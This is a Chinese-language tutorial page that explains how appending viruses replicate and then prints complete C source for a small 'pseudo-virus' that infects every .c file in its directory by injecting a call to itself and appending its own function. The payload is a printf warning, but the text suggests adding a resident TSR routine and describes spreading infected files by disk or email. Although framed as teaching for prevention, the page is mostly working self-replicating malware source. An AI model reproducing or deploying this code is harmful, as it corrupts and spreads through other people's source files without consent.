快捷導(dǎo)航

c病毒程序原理分析(防范病毒 c語(yǔ)言小病毒示例)

更新時(shí)間：2013年12月11日 14:54:49 作者：

這篇文章主要介紹了病毒程序原理,寫(xiě)個(gè)小程序做演示，大家可以參考這個(gè)以防中相似C病毒

病毒的特點(diǎn)：

病毒的最大特點(diǎn)就是自我復(fù)制，從病毒的分類(lèi)來(lái)說(shuō)有很多種，這里我們將介紹最流行的附加式
病毒，它通過(guò)對(duì)正常的文件進(jìn)行改寫(xiě)，增加來(lái)實(shí)現(xiàn)其自我復(fù)制的目的。
從程序的角度來(lái)說(shuō)，我們要做的事情有兩件：

1，讓程序能夠?qū)⒆约涸诓挥绊懫渌绦虮旧砉ぷ鞯那闆r下復(fù)制給其它程序，
使它具備繼續(xù)復(fù)制的能力。

2，在一定條件下使其產(chǎn)生某種發(fā)作效果。
其實(shí)第一件事情實(shí)際上可以看成對(duì)文件進(jìn)行復(fù)制，把病毒源文件的功能函數(shù)全部放到被感染
文件的最后，同時(shí)在被感染文件中調(diào)用這個(gè)函數(shù)

下面給出c語(yǔ)言的實(shí)現(xiàn)過(guò)程：
1，主程序調(diào)用病毒功能函數(shù)
2，病毒功能函數(shù)讀取查找同目錄下所有c文件；
3，找到一個(gè)（被感染c文件)，打開(kāi)它，并且將此文件全部讀取到數(shù)組變量；
4，重新創(chuàng)建一個(gè)同名文件（被感染c文件）
5，數(shù)組變量寫(xiě)回這個(gè)被感染c文件，同時(shí)將病毒源文件所需要的頭文件，病毒功能函數(shù)
調(diào)用語(yǔ)句寫(xiě)入；
6，打開(kāi)病毒源文件，將病毒功能函數(shù)全部寫(xiě)到被感染c文件的最后；

這樣一個(gè)簡(jiǎn)單的c語(yǔ)言偽病毒virus.c就完成了
運(yùn)行程序后其內(nèi)容變化另保存為after_virus.c
此時(shí)，如果我們將1.c文件用A盤(pán)復(fù)制到其他機(jī)器或者Email給別人，結(jié)果
他們一運(yùn)行又感染了他們保存1.c文件目錄下所有c文件
對(duì)于第二件事情-------“發(fā)作效果”，這里只用printf語(yǔ)句警告了一下，當(dāng)然你
完全可以寫(xiě)一個(gè)TSR駐留函數(shù)
其實(shí)，這個(gè)程序勉強(qiáng)可以叫做病毒
根本不算是真正的病毒，好了就說(shuō)這么多，

復(fù)制代碼代碼如下:

代碼如下：
#include <stdio.h>
#include <dir.h>
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i>=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#include<stdio.h>\n",out);
fputs("#include<dir.h>\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;j<i-1;j++)
if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);
fclose(read);
fclose(out);
printf("\nYour c program  %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}